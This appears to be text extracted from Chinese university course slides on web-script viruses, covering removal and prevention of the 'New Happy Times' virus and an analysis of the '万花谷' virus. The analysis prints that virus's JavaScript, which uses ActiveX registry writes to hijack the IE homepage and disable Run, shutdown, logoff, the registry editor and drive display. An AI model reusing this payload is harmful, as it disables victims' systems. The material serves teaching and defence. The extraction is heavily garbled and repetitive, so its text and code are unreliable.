&"\Mail\下相关键值；参照其他系统，恢复HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\下相关键值；参照其他系统，恢复HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\下相关键值；（3）删除文件参照其他系统，恢复%Windows%\web目录下folder.htt文件；删除Kernel32.dll或者Kernel.dll文件；删除kjwall.gif；查找所有存在KJ_start字符串的文件，删除文件尾部的病毒代码。手工清除新欢乐时光病毒新欢乐时光手工清除在Windows正常模式下可以采取如下的步新欢乐时光病毒预防采用以下操作进行预防：a.连接微软升级网站为系统打上必要的补丁；b.请安装反病毒软件，并升级到最新的病毒库，坚持打开实时防病毒监控程序和及时升级病毒库；c.删除信箱中可疑的电子邮件，建议尽量不要使用信纸；d.对于Windows9x/Me，建议取消共享，如果必须设置共享的话，建议设置为只读或者设置密码；对于WindowsNT/2000，应为文件夹配置适当的权限，在有域的网络中，所有用户，特别是管理员级用户必须保证自己不感染病毒。在WindowsXP中一般不会感染该病毒。e.在使用移动储存介质之前，如光盘、软盘、移动硬盘等，建议先使用防病毒软件检查一遍是否存在病毒，如果光盘有病毒的话，建议不要再使用该光盘；如果不具备这个条件，关闭Web视图可以部分地防止这个病毒，但对于被感染的html等文件，则这个方法可能无法奏效。

预防新欢乐时光病毒新欢乐时光病毒预防采用以下操作进行预防：预防新欢乐时光病毒新欢乐时光病毒预防f.特别地：利用这个病毒的设计缺陷，可以在%windir%System创建名为kernel.dll（Win9x/ME系统）或kernel32.dll（WinNT/2000系统）的目录，这样可以在一定程度上阻止病毒的传染。特别注意：在不同的系统中创建的目录名称是不同的，应根据不同的系统来创建对应的目录。如果提示不能创建文件夹，请在杀毒后再创建。g.对于一些熟练操作计算机的用户来说，可以通过编辑原正常的folder.htt，在文件头加上<BODYKJ_start()>这一句话，可以预防病毒的传染；h.还有一些情况是某些防病毒程序并不能有效地防止病毒的传播，遇到这种情况的时候建议换一个防病毒软件。

新欢乐时光病毒预防f.特别地：利用这个病毒的设计缺陷，可以在本讲小结万花谷病毒特点及代码分析万花谷病毒手工清除新欢乐时光病毒特点及代码分析掌握典型网页病毒行为分析，具有一定的反病毒能力计算机病毒与防治课程小组

新欢乐时光病毒手工清除本讲小结万花谷病毒特点及代码分析万花谷病毒手工清除新欢乐时光ThankYou!ThankYou!计算机病毒与防治重庆电子工程职业学院计算机病毒与防治课程小组计算机病毒与防治重庆电子工程职业学院计算机病毒与防治课程小组教学单元3-4网页脚本病毒防治

万花谷病毒的手工清除

万花谷病毒特点及代码分析梅丽莎病毒特点及代码分析第二讲典型网页病毒剖析计算机病毒与防治课程小组

梅丽莎病毒的手工清除教学单元3-4网页脚本病毒防治万花谷病毒的手工清除万万花谷病毒特点计算机病毒与防治课程小组病毒类型网页脚本病毒危险级别★★★★★影响系统Win9X/ME/NT/2000/XP/2003

万花谷病毒特点病毒名称:万花谷万花谷病毒特点计算机病毒与防治课程小组病毒类型网页脚本病万花谷病毒特点计算机病毒与防治课程小组曾经在互连网上散发过一个美丽诱人的网址“万花谷”，这实际是一个恶意“陷阱”，有人经不住诱惑，只用鼠标轻轻点一下，计算机就立即瘫痪了，这是有人利用Java最新技术进行破坏的一个恶意网址。

本病毒是在页面中嵌入了恶意的JavaScript代码，它最初出现在个人网站上，随后其他一些个人主页也模仿或被感染了该病毒代码。万花谷病毒特点万花谷病毒特点计算机病毒与防治课程小组曾经在互连网上散发过一万花谷病毒特点计算机病毒与防治课程小组其破坏特性如下：(1)用户不能正常使用WINDOWS的DOS功能程序；(2)用户不能正常退出WINDOWS；(3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽，防止用户重新以DOS方式启动，关闭DOS命令、关闭REGEDIT命令等。(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。具体的表现形式是：(1)网络地址是：；(2)在IE的“收藏夹”中自动加上“万花谷”的快捷方式,网络地址是：http://96；万花谷病毒特点万花谷病毒特点计算机病毒与防治课程小组其破坏特性如下：万花谷万花谷病毒源码分析计算机病毒与防治课程小组document.write("<APPLETHEIGHT=0WIDTH=0Code=com.ms.activeX.ActiveXComponent></APPLET>");

function

AddFavLnk(loc,

DispName,

SiteURL)

{

var

Shor

=

Shl.CreateShortcut(loc

+

"\\"

+

DispName

+".URL");

Shor.TargetPath

=

SiteURL;Shor.Save();

}

function

f(){

Try

{

//ActiveX

initialization

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl

=

a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();

FSO

=

a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Net

=

a1.GetObject();

万花谷病毒源码分析计算机病毒与防治课程小组document.万花谷病毒源码分析计算机病毒与防治课程小组try

{

if

(documents

.cookies.indexOf("Chg")

==

-1)

{

//以下内容是对注册表进行修改Shl.RegWrite

("HKCU\\Software\\Microsoft\\Internet

Explorer\\Main\\Start

Page","/");

var

expdate

=

new

Date((new

Date()).getTime()

+

(1));

documents.cookies="Chg=general;

expires="

+

expdate.toGMTString()

+

";

path=/;"

//设置IE主页Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun",

01,

"REG_BINARY");

//消除RUN按纽Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose",

01,

"REG_BINARY");

//消除关闭按纽Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff",

01,

"REG_BINARY");

//消除注销按纽Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives",

"63000000",

"REG_DWord");

//隐藏盘符万花谷病毒源码分析计算机病毒与防治课程小组try

{

万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools",

"00000001",

"REG_DWORD");

//禁止注册表编辑器Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop",

"00000001",

"REG_DWORD");

//屏蔽所有桌面图标Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled",

"00000001",

"REG_DWORD");

//禁止运行Dos程序Shl.RegWrite

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode",

"00000001",

"REG_DWORD");//屏蔽所有桌面图标Shl.RegWrite

("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption",

"您的计算机已经被/优化:

）");//设置开机提示Shl.RegWrite

("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText",

"您的计算机已经被/优化:）");//弹出窗口中的内容万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWr万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite

("HKLM\\Software\\Microsoft\\Internet

Explorer\\Main\\Window

Title","新的标题★/

&

/");Shl.RegWrite

("HKCU\\Software\\Microsoft\\Internet

Explorer\\Main\\Window

Title","新的标题★/

&

/");//设置IE标题

var

expdate

=

new

Date((new

Date()).getTime()

+

(1))